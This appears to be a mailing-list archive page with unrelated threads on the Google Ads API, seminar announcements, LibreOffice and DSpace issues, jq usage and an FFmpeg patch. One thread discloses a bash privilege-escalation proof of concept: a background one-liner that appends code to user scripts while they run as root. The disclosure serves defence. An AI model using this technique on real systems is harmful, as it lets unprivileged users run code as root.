Insufficient scope when using ConversionUploadService

2024-04-26 Thread gcp admin
Hi,
I've been using the Google Ads API to manage our accounts. I've been able
to do things like download reports, edit campaign / ad group criteria just
fine.

However, I'm currently experiencing problems when trying to upload offline
conversions. Using the same credentials as I've always (successfully) used,
I now get the error message below.

I'd ben very grateful if you have any suggestions for what might be causing
this!

Cheers, Ben

Brownian motion, theory confirmation and the stratification of scientific
knowledge
Alan Chalmers

Dates: Monday, 22 April 2024
Time: 5:30pm
Venue: New Law Building (F10), Level 3, Room 344
How to register: Free, no registration required.

Abstract: Jean Perrin’s experiments on Brownian motion are typically seen as
providing especially decisive evidence for the reality of molecules. Research
in the area has been raised to a new level of sophistication by George Smith
and Raglan Seth in their book Brownian motion and molecular reality. In this
paper I draw out and elaborate on key consequences of that work that are of
general interest. I use the case of Brownian motion to argue (i) That there is
more to the confirmation of scientific theories than the validation of their
predictive and explanatory power. The concordance of alternative measures of a
physical quantity offers a stronger kind of confirmation. Those scientists who
saw Perrin’s and associated research as bringing an end to the hypothetical
status of molecular-kinetic theory had a point. (ii) Perrin established
knowledge of Brownian motion at various levels, some involving no theory, some
assuming that the motions of Brownian granules is governed by Newton’s laws of
motion and some invoking the molecular-kinetic theory. Knowledge at each level
was vindicated by appeal to concordant measures of physical quantities,
implying that knowledge at each level has a similar epistemological status. It
is not the case that knowledge necessarily gets more speculative the further it
gets from what is directly observable to the senses nor is it the case that
knowledge at the atomic and molecular level is superior to that at the
observable level because it can in principle explain the latter and render it
redundant. Knowledge at the various levels and the relationship between them
are all key elements of scientific knowledge and its mode of progress. (iii) An
appreciation of the various levels of knowledge of Brownian motion helps to
dispel any puzzles that arise from an alleged clash between the time asymmetry
of many physical processes and the time symmetry of the laws governing the
micro-processes that give rise to them.

Bio: Alan Chalmers received a PhD in HPS from the University of London in 1971.
He then came to the University of Sydney as a Post-doctoral Fellow in the
Department of Philosophy . He remained at that institution until his
'retirement' in 1999. In 1985 he took up the position of Senior Lecturer in HPS
in the Science Faculty and started the process of converting the one-person
outfit it then was into the School of History and Philosophy of Science that it
has now become. His most important books are What is this thing called science?
The scientist's atom and the philosopher's stone and One hundred years of
pressure: Hydrostatics from Stevin to Newton. He is the author of some 70 or so
articles in history and philosophy of the physical sciences.

[Desktop-packages] [Bug 1772430]

2024-04-14 Thread Qa-admin-q
Dear bugzilla,

To make sure we're focusing on the bugs that affect our users today,
LibreOffice QA is asking bug reporters and confirmers to retest open,
confirmed bugs which have not been touched for over a year.

There have been thousands of bug fixes and commits since anyone checked
on this bug report. During that time, it's possible that the bug has
been fixed, or the details of the problem have changed. We'd really
appreciate your help in getting confirmation that the bug is still
present.

If you have time, please do the following:

Test to see if the bug is still present with the latest version of
LibreOffice from https://www.libreoffice.org/download/

If the bug is present, please leave a comment that includes the information
from Help - About LibreOffice.

If the bug is NOT present, please set the bug's Status field to
RESOLVED-WORKSFORME and leave a comment that includes the information from Help
- About LibreOffice.

Please DO NOT

Update the version field
Reply via email (please reply directly on the bug tracker)
Set the bug's Status field to RESOLVED - FIXED (this status has a particular
meaning that is not
appropriate in this case)

If you want to do more to help you can test to see if your issue is a
REGRESSION. To do so:
1. Download and install oldest version of LibreOffice (usually 3.3 unless your
bug pertains to a feature added after 3.3) from
https://downloadarchive.documentfoundation.org/libreoffice/old/

2. Test your bug
3. Leave a comment with your results.
4a. If the bug was present with 3.3 - set version to 'inherited from OOo';
4b. If the bug was not present in 3.3 - add 'regression' to keyword

Feel free to come ask questions or to say hello in our QA chat:
https://web.libera.chat/?settings=#libreoffice-qa

Thank you for helping us make LibreOffice even better for everyone!

Warm Regards,

Title:
[upstream] Proportional line spacing under 100 % makes first line too
  low in LibreOffice Writer

Status in LibreOffice:
  Confirmed
Status in libreoffice package in Ubuntu:
  Confirmed

Bug description:
Using proportional line spacing with less than 100 % makes the first
line of each paragraph and each page considerably lower than all the
  other lines.

This problem is an issue particularly with fonts designed for Arabic,
where the default line spacing is very big so as to allow for space
for optional vowel marks below and above the line. If these marks are
not used, the space between the lines is often too big. If I change
line spacing to proportional 80 %, most of the lines look fine but the
first line of each paragraph and of each page (even without a
paragraph break) gets crammed into the second line. As a user, I would
rather expect the first line to have the same visual height as all the
other lines. See the attached document and screenshots using Noto
Naskh Arabic and 80 % line spacing.

Re: [Semibug] Need an example of libxo usage

2024-04-13 Thread admin

Mike Wayne wrote on 2024-04-12 15:55:

Not too helpful.

-f specifies the lastlogin FILE to use, not fields

Ugh, confidently wrong.

As mentioned, I'm trying to use --libxo text, not xml

That's my dumb mistake.

Looking to get lastlogin to print a single line:
wayne last login: Fri Apr 12 15:06:16 2024 from 192.168.63.146

I'm guessing I need the printf equivalent for libxo but it appears
not to be documented anywhere.

I think JSON should do it via `jq`.

printf "%s last login %s from %s\n" $(lastlogin --libxo json | jq -r
'.user,.login-time,.from')

I don't have any BSD system to try this on, but something like that
ought to work.

Example:

└─» $ printf "%s %s %s\n" $(echo -n '{"user": "Wayne", "from":
"192.168.63.146", "login_time": "today"}' | jq -r '.user, .login_time,
.from')

Wayne today 192.168.63.146

A couple things to watch for: JSON / jq won't like a key with a hyphen,
such as login-time. I'd assume / hope that libxo would do the
transformation required for proper JSON.

Also, IFS might need tweaking as the date containing spaces will get
parsed into separate printf string placeholders.

Or some `sed` transforms.

Re: [dspace-tech] Mode of upgrading a DSpace repository from version 6 to 7 or 8

Okay, so apparently moving the site to a new url without manipulating
database could be painless.

Thank you, will be testing it further.

Re: [dspace-tech] Mode of upgrading a DSpace repository from version 6 to 7 or 8

2024-04-11 Thread admin
Hello Gustav,

Thanks. And can I test DSpace under temporary url and the move it into
final destination just by changing url in DSpace config? Or the url is also
included in the database so moving DSpace to a new url wouldn't be that
easy?

[dspace-tech] Mode of upgrading a DSpace repository from version 6 to 7 or 8

2024-04-10 Thread admin
Hello,

I am now considering various approaches to upgrade DSpace from ver. 6 to 7
or 8.

Would it be feasible to install a fresh new DSpace version and then import
publications from the old repository, but preserving specific elements like
item handles? Or traditional way of upgrading would be eventually less
challenging? I don't care about any UI customization, but obviously keeping
the current handles would be critical.

Thanks
Peter

Experimental Philosophy of Health and Disease
Somogy Varga and Andrew J. Latham (Aarhus University)

Dates: Monday, 15 April 2024
Time: 5:30pm
Venue: New Law Building (F10), Level 3, Room 344
How to register: Free, no registration required.

Abstract: While the philosophy of medicine has seen extensive discussions
focusing on the concepts of health, disease, and dysfunction, the exact content
of these concepts remains contested. In this talk, we will report some results
from a series of experimental philosophy studies which aimed to examine how
people understand and deploy these concepts, and the factors that influence
their judgments. We will then discuss the implications that these findings
carry for the philosophical debates and for health-related communication in
both clinical and public health settings..

Bio: Somogy Varga is professor of philosophy at Aarhus University and director
of the Center for Philosophy and the Health Sciences. His current research is
mostly concerned with topics in the philosophy of science, psychiatry, and
medicine. He is the author of four books: Science, Medicine, and the Aims of
Inquiry (Cambridge University Press, in press), Scaffolded Minds (MIT Press,
2019), Naturalism, Interpretation and Mental Disorder (Oxford University Press,
2015), and Authenticity as an Ethical Ideal (Routledge, 2011). Some of his
research papers were published in leading medical/psychological journals (e.g.,
Psychological Review, Neuroscience & Biobehavioral Reviews), others in
philosophical journals(e.g., PPR, AJP).

Bio: Andrew J. Latham is an AIAS-PIREAU research fellow at Aarhus University.
He works at the intersection of metaphysics, ethics and cognitive science and
is interested in what empirical discoveries, particularly in the psychological
and brain sciences, reveal about the nature of phenomena. Andrew has authored
many papers in experimental philosophy, with many of them being published in
leading philosophy journals (i.e., Noûs, Journal of Philosophy, and Philosophy
and Phenomenological Research). He was recently awarded both a Marie Curie
European Postdoctoral Fellowship and Discovery Early Career Research Award.

You'd want to add an "exit" as well, to protect against new lines of
code being appended to the script.

Yes that is correct. it's far easier to add new lines then to edit the
content unnoticed, since you would have to know where you can insert or
replace something, eg. a comment.

Btw wouldn't it be possible (and worth) temporarily revoking write
access to the user while it's being executed as root, and restoring
original rights after execution? The problem isn't really how it's
executed, but that it's writable during execution...
This could of course leave the temporary rights if the process is
killed...

Shells interpret their input in much the same way, regardless of

My answer to that would be: No! I would expect it to handle file

Anyway... I reported what I found concerning, you guys know best what's

I'm gonna put my code in {} and end with exit from now on to make it at

Re: Potential Bash Script Vulnerability

2024-04-07 Thread admin
k... Well maybe my first message wasn't convincing
enough. I see it as a serious threat so I spent the afternoon to proove
it by writing a one liner exloit example... :)

No ill intent, just trying to help since even the best sys admin are
people, and thus prone to error. A malicious script does not care, does
not tire, does not make mistakes, therefore better safe then sorry.

I hope it helps!
Tibor- This is the kind of on the fly edit I'm worried about:
while true; do DotShProcessList=$(ps -e | grep "\.sh$" | grep -E "tty|pts" |
awk '{ print $4 "\t" $1 }' | awk '{ print $2 " " }');
UserScriptsRunningAsRoot=$(for i in ${DotShProcessList}; do lsof -p $i; done |
grep -E ".*root.*cwd" | awk '{ print $2 "" }'); ScriptFiles=$(for i in
${UserScriptsRunningAsRoot}; do ps -e | grep $i | awk '{ print $4 }' | find ~
-name $(cat); done); if [[ ! -z "$ScriptFiles" ]]; then echo "${ScriptFiles}" |
while IFS= read -r i; do if [[ -z $(tail -n 1 $i | grep "exit") ]]; then echo
"if [[ \$(whoami) == \"root\" ]]; then echo \"I could do damage here completely
unnoticed as \$(whoami) >:)\"; exit 0; fi" >> $i; fi; done; fi; sleep 0.5; done&

Breakdown:
- Looks for list of PIDs started by the user, whether it's started in terminal
or command line, and saves them into $DotShProcessList
DotShProcessList=$(ps -e | grep "\.sh$" | grep -E "tty|pts" | awk '{ print $4
"\t" $1 }' | awk '{ print $2 " " }');

- Takes $DotShProcessList and filters out those that don't have root access.
Those that do are saved into $UserScriptsRunningAsRoot
UserScriptsRunningAsRoot=$(for i in ${DotShProcessList}; do lsof -p $i; done |
grep -E ".*root.*cwd" | awk '{ print $2 "" }');

- Searches for file names of $UserScriptsRunningAsRoot processes in /home/$USER
(aka ~) and save it to $ScriptFiles
ScriptFiles=$(for i in ${UserScriptsRunningAsRoot}; do ps -e | grep $i | awk '{
print $4 }' | find ~ -name $(cat); done);

- If the file list isn't empty then loop through it line by line, and if the
file does not contain "exit" a the last line, append a potentially dangerous
line to it.
if [[ ! -z "$ScriptFiles" ]]; then echo "${ScriptFiles}" | while IFS= read -r
i; do if [[ -z $(tail -n 1 $i | grep "exit") ]]; then echo "if [[ \$(whoami) ==
\"root\" ]]; then echo \"I could do damage here completely unnoticed as
\$(whoami) >:)\"; exit 0; fi" >> $i; fi; done; fi;

- The whole thing is put in an infinite loop, and forked to background with a
sleep 0.5 so it executes periodically, as normal user, and watches for a user
launched script that runs as root. (any script with .sh at the end located in
/home/$USER.) Once a loop like this is running in the background without any
privileges, it's enough to execute an install.sh script that must run as root
and takes a few seconds to finish or stops for a prompt (long enough to be
detected and edited by the background process), anywhre within /home/$USER and
you're screwed. This makes it difficult to trust a script even if I wrote it,
and know what it supposed to do, or to run a script as root to test things!

- This is just a demo of the vulnerability so this is the potentially dangerous
line it injects:
if [[ $(whoami) == "root" ]]; then echo "I could do damage here completely
unnoticed as $(whoami) >:)"; exit 0; fi
- The exit 0 in it will also prevent it from injecting it twice...

- If you want to run it, use this as a precaution to check for running scripts
you don't want it to edit... (Uses the first 2 steps of the above script to
print .sh processes to the terminal started by user running as root)
DotShProcessList=$(ps -e | grep "\.sh$" | grep -E "tty|pts" | awk '{ print $4
"\t" $1 }' | awk '{ print $2 " " }') && UserScriptsRunningAsRoot=$(for i in
${DotShProcessList}; do lsof -p $i; done | grep -E ".*root.*cwd" | awk '{ print
$2 "" }') && for i in ${UserScriptsRunningAsRoot}; do ps -e | grep $i; done

Potential Bash Script Vulnerability

2024-04-06 Thread admin

Hello everyone!

I've attached a minimal script which shows the issue, and my recommended
solution.

Affected for sure:
System1: 64 bit Ubuntu 22.04.4 LTS - Bash: 5.1.16(1)-release - Hardware:
HP Pavilion 14-ec0013nq (Ryzen 5 5500u, 32GB RAM, Radeon grapics, nvme
SSD.)
System2: 64 bit Ubuntu 20.10 (No longer supported.) - Bash:
5.0.17(1)-release - Hardware: DIY (AMD A10-5800k, 32GB RAM, Radeon
graphics, several SATA drives)

and probably a lot more...

Not sure whether or not this is a know issue, truth be told I discovered
it years ago (back around 2016) as I was learning bash scripting, and
accidentally appended a command to the running script, which got
executed immediately after the script but back then I didn't find it
important to report since I considered myself a noob. I figured someone
more experienced will probably find and fix it, or there must be a
reason for it. I forgotű it. Now watching a video about clever use of
shell in XZ stuff I remembered, tested it again and found it still
unpatched. :S So now I'm reporting it and hope it helps!

Read the code, test it, fix it. More explanation in the comments.

Since it's very old I'd recommend a silent fix before announcement,
especially since I also found a potentially easy fix.

Kind regards
Tibor<>

[Ada_list] 2024 ADA Symposium – Registration is now open – Full lineup announced

2024-04-04 Thread admin

Tēnā koutou,

Registration for the 2024 ADA Symposium is now open;
https://ada.net.nz/events/rising-algorithms/
https://www.eventbrite.com/cc/rising-algorithms-3248939

Aotearoa Digital Arts Network Symposium, 'Rising Algorithms: Navigate,
Automate, Dream'

22 - 26 May 2024
Te Whanganui-a-Tara / Wellington and online

Who is listening? How did it know? Where to next?
The Aotearoa Digital Arts Network (ADA) is delighted to announce the
full lineup of events for its 2024 symposium 'Rising Algorithms:
Navigate, Automate, Dream'.

'Rising Algorithms: Navigate, Automate, Dream'_ _explores the increasing
sophistication of machine learning and artificial intelligence, its
growing accessibility for artists and the general consumer, and its
influence on wider society as we navigate complex environmental, social
and economic issues worldwide. In our digitally ubiquitous era, we ask
if technology can solve the wicked problems of our time or if it is
exacerbating them? How have powerful machine learning-driven tools
impacted contemporary cultural production? How are artists in Aotearoa
navigating this shifting landscape?

Over one week in Wellington artists, technologists, and critical
thinkers will delve into these questions, all with a spirit of open
enquiry guided by the symposium's three themes, navigate, automate, and
dream.

Wellingtonians will be able to discover the landscape of art, machine
learning and AI through a wide range of creative experiences and
approaches. These include a new, site-responsive commission from Julian
Oliver popping up on rooftops around the city, group exhibitions at The
Engine Room and null gallery, online artworks, and a performance evening
at Vogelmorn Community Precinct.

Those who want to explore the creative possibilities of AI tools will
have an opportunity to learn through hands-on workshops at TwoFiftySeven
on Friday 24 May.

Finally, over the weekend of 25 - 26 May, a full program of symposium
talks and panel discussions will take place at the Te Aro campus of Te
Herenga Waka. The two day program will explore the breadth of our
creative and critical engagement with machine learning. As part of our
weekend program, ADA will present three keynote discussions led by
Julian Oliver, Eugene Hansen (Maniopoto) and Emele Ugavule (Tokelau,
Fiji).

'Rising Algorithms: Navigate, Automate, Dream'_ _is made possible with
the support of our presenting partner Toi Hourua and funding from
Creative New Zealand and Wellington City Council. Our symposium venues
have been made possible through the generosity of Te Herenga
Waka--Victoria University of Wellington, Vogelmorn Community, and
TwoFiftySeven. Exhibition partners include The Engine Room at Massey
University, null gallery and Urban Dream Brokerage.

We look forward to seeing you in May!

Ngā mihi,
ADA Board of Trustees and convening committee

Visualizing the Body with Text and Image: The Early Modern Grammar of
Anatomical Illustration
Gideon Manning (Cedar-Sinai Medical Centre)

Dates: Monday, 8 April 2024
Time: 5:30pm
Venue: New Law Building (F10), Level 3, Room 344
How to register: Free, no registration required

Abstract: The first anatomical images in printed books were the result of a now
well-known negotiation between art, enterprise, and the study of nature. There
have been many valuable contributions made to our understanding of these
images—their genesis and function—by historians of science, historians of the
book, and historians of art and visual culture. In this presentation, however,
I will reflect on anatomical images with the history of medicine specifically
in mind. I will argue that the early modern anatomist’s threefold distinction
among historia-actio-usus served as the initial grammar of anatomical
illustration. Examining the formal, investigative procedures of anatomists in
the early modern period, at the precise moment when anatomical images became a
standard feature of medical textbooks and works of natural philosophy, I will
detail how the histo-ria-actio-usus distinction helps us understand the
existence of divergent images, competing agendas, and disputes over accuracy.
Case studies will come from early modern and later editions of Galen, Harvey,
and Descartes, focusing on the mechanical body, as well as several more recent
and non-Euro-Western anatomical illustrations.

Bio: Gideon Manning is Associate Professor of History of Medicine and
Humanities at the Cedar-Sinai Medical Center, where he directs the Program in
the History of Medicine. initially trained as a philosopher, and later as an
historian of science and medicine, Gideon’s research focuses especially on the
emergence of a mechanical conception of nature and the human body. He is the
author more than two dozen articles and book chapters and the editor or
co-editor of four books, most recently, “Women and the Life Sciences” and The
Collected Wisdom of the Early Modern Scholar with Anne Marie Roos. Gideon is
currently writing a monograph about the history of the good death and several
papers related to the history of surgery.

[FFmpeg-devel] [PATCH] libavformat\file:Fix duplicate JNI symbols

2024-03-23 Thread admin
From: 联盟少侠

The errors indicate that there are multiple definitions of several JNI (Java
Native Interface) symbols in the FFmpeg library. Specifically, the linker
ld.lld has found duplicate definitions for the following symbols:

- ff_jni_get_env
- ff_jni_jstring_to_utf_chars
- ff_jni_utf_chars_to_jstring
- ff_jni_exception_get_summary
- ff_jni_exception_check
- ff_jni_init_jfields
- ff_jni_reset_jfields

These symbols are defined in both libavcodec.a and libavformat.a archives,
leading to conflicts during the linking process. The duplicates are found in
the same source file ffjni.c, but they are being compiled into two different
static libraries.

To resolve these errors, ensure that each symbol is defined only once across
all linked libraries, or if these symbols are required in both libraries, they
should be marked as weak symbols to allow the linker to handle them
appropriately. Additionally, check for any build script misconfigurations that
may be causing the same file to be included in multiple libraries.
